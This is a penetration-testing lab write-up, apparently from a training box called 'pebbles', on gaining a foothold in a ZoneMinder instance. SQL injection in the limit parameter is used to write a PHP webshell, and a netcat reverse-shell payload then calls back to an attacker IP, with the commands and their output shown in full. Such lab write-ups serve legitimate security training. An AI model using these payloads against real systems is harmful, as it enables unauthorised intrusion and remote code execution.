RCE via SQL injection
A SQL injection vulnerability has been identified and is present at the limit parameter of the index.php file of the target’s vulnerable ZoneMinder instance. Web root directory for the instance was leaked and write access was also confirmed at a later stage
PHP Webshell
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ sqli=$(echo '; SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/usr/share/zoneminder/www/webshell.php" -- -' | jq -sRr @uri) ; curl -s -i -X POST http://$IP/zm/index.php -H 'Content-type: application/x-www-form-urlencoded' -d "view=request&request=log&task=query&limit=100$sqli"Writing a PHP webshell into the web root directory; /usr/share/zoneminder/www/
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ curl http://$IP/zm/webshell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)confirmed
RCE
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ ┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ alias urlencode='/usr/bin/jq -sRr @uri'
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ cmd=$(echo 'mkfifo /tmp/datj; nc 192.168.45.192 21 0</tmp/datj | /bin/sh >/tmp/datj 2>&1; rm /tmp/datj' | urlencode) ; curl http://$IP/zm/webshell.php?cmd=$cmd
Sending the payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ nnc 21
listening on [any] 21 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.209.52] 50320
whoami
www-data
hostname
pebbles
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:b0:4b brd ff:ff:ff:ff:ff:ff
inet 192.168.209.52/24 brd 192.168.209.255 scope global ens160
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the www-data account via SQL injection to RCE